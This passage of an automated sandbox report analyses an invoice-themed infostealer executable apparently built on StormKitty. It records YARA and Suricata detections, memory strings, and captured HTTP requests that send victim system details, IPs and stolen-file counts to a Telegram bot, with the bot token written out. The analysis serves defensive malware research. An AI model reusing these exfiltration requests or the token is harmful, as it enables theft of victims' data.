Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-12-31%208:29:05%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20932923%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20UK7PCEYE%0ARAM:%204095MB%0AHWID:%20EE6ED39488%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-12-31%208:29:15%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20932923%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20UK7PCEYE%0ARAM:%204095MB%0AHWID:%20EE6ED39488%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.16.184.241 104.16.184.241
Source: Joe Sandbox View	IP Address: 172.67.196.114 172.67.196.114

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: icanhazip.com

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 149.154.167.220:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-12-31%208:29:05%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20932923%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20UK7PCEYE%0ARAM:%204095MB%0AHWID:%20EE6ED39488%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-12-31%208:29:15%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20932923%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20UK7PCEYE%0ARAM:%204095MB%0AHWID:%20EE6ED39488%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: 59.60.14.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Tue, 31 Dec 2024 13:29:18 GMTContent-Type: application/jsonContent-Length: 84Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Tue, 31 Dec 2024 13:29:27 GMTContent-Type: application/jsonContent-Length: 84Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.000000000392A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.mylnikov.org
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.000000000392A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.mylnikov.orgd
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003377000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003311000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003377000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003311000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/t
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003272000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.comd
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723026401.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1824098477.0000000002C02000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1724798197.0000000005694000.00000004.00000020.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1725092929.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003272000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org
Source: SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
Source: SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003272000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003272000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d
Source: SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003377000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003311000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003377000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.00000000032F7000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003948000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage
Source: SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=52871
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/file/bot
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003377000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.00000000032F7000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.0000000003948000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000039C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgd
Source: tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000038C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty0&yq
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4117062376.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4117251220.00000000037B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKittyTCqq
